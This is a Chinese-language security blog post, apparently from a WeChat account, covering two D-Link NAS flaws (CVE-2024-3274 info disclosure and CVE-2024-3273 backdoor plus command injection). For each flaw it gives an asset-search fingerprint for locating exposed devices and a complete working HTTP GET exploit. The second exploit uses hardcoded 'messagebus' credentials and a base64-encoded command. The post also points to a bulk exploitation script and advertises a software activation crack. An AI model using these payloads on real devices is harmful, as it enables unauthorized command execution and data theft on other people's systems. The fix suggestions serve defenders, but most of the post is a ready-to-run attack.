前言:本文中涉及到的相关技术或工具仅限技术研究与讨论,严禁用于非法用途,否则产生的一切后果自行承担,如有侵权请联系。
由于微信公众号推送机制改变了,快来星标不再迷路,谢谢大家!
0x01 D-Link DNS敏感信息泄露 (CVE-2024-3274)
漏洞详情
允许将敏感设备信息暴露给未经授权的参与者。此漏洞是由于 info.cgi 脚本中存在未经身份验证的访问缺陷所致,该漏洞可通过简单的 HTTP GET 请求加以利用。
影响版本
DNS-327L Version=1.00.0409.2013
DNS-320L Version=1.02.0329.2013 and Version=1.01.0914.2012
DNS-320LW Version=1.01.0914.2012
资产测绘
body="Text:In order to access the ShareCenter"
漏洞复现
payload
GET /cgi-bin/info.cgi HTTP/1.1
Host: 1.1.1.1:8080
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Connection: close
Upgrade-Insecure-Requests: 1
修复建议
建议将对设备管理接口的访问限制为仅受信任的 IP 地址,并应用网络级身份验证。
0x02 D-Link NAS 命令执行 (CVE-2024-3273)
漏洞详情
该漏洞存在于nas_sharing.cgi uri中,由于两个主要问题而易受攻击:硬编码凭据提供的后门,以及通过系统参数的命令注入漏洞。此攻击可导致在受影响的D-Link NAS设备上执行任意命令,允许攻击者通过指定命令访问敏感信息、更改系统配置或拒绝服务。
影响版本
DNS-320L
Version 1.11、
Version 1.03.0904.2013、
Version 1.01.0702.2013,
DNS-325 Version 1.01
DNS-327L Version 1.09、Version 1.00.0409.2013
DNS-340L Version 1.08
资产测绘
body="Text:In order to access the ShareCenter"
漏洞复现
该漏洞存在于CGI脚本中,这会导致:nas_sharing.cgi,通过用户名和密码暴露的后门:请求包括用户名(user=messagebus)和空密码字段 (passwd=)的参数。这表示后门允许未经授权的访问而没有适当的身份验证。
通过系统参数注入命令:请求中的系统参数带有一个 base64 编码值,该值为命令。
payload
GET /cgi-bin/nas_sharing.cgi?user=messagebus&passwd=&cmd=15&system=aWQ= HTTP/1.1
Host: 1.1.1.1:8080
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Connection: close
Upgrade-Insecure-Requests: 1
aWQ=为id命令的base64编码
成功利用此漏洞可允许攻击者在系统上执行任意命令,从而可能导致未经授权访问敏感信息、修改系统配置或拒绝服务等情况。
修复建议
应用设备制造商提供的可用修补程序和更新。
批量脚本关注不秃头的安全回复 CVE-2024-3273 获取,后缀txt改py
参考链接:
https://github.com/netsecfish/info_cgi?tab=readme-ov-file
https://github.com/netsecfish/dlink?tab=readme-ov-file
https://mp.weixin.qq.com/s/eDIg7eOe6QcJcYBikNfphQ 弥天安全实验室
往期推荐
关于我们:
感谢各位大佬们关注-不秃头的安全,后续会坚持更新渗透漏洞思路分享、安全测试、好用工具分享以及挖掘SRC思路等文章,同时会组织不定期抽奖,希望能得到各位的关注与支持。
关注福利:
回复“google工具" 获取 google语法生成工具
回复“小程序渗透工具" 获取 小程序渗透工具
回复“暴力破解字典" 获取 各种常用密码字典打包
回复“typora激活" 获取 最新typora激活程序
回复“蓝队工具箱”即可获取一款专业级应急响应的集成多种工具的工具集
知识星球
星球里有什么?
CNVD、EDU及SRC赏金,攻防演练资源分享(免杀,溯源,钓鱼等),各种新鲜好用工具,最新poc定期更新,以及一些好东西(还在学怎么挖通用漏洞吗快来加入),100多位师傅的选择,16个专栏会持续更新~提前续费有优惠,好用不贵很实惠
交流群
回复"加群"或加我联系方式拉交流群~
安全考证
需要考以下各类安全证书的可以联系我,绝对低价绝对优惠、组团更便宜,报名成功先送星球一年,CISP、PTE、PTS、DSG、IRE、IRS、NISP、PMP、CCSK、CISSP......巨优惠:
推荐站内搜索:最好用的开发软件、免费开源系统、渗透测试工具云盘下载、最新渗透测试资料、最新黑客工具下载……
还没有评论,来说两句吧...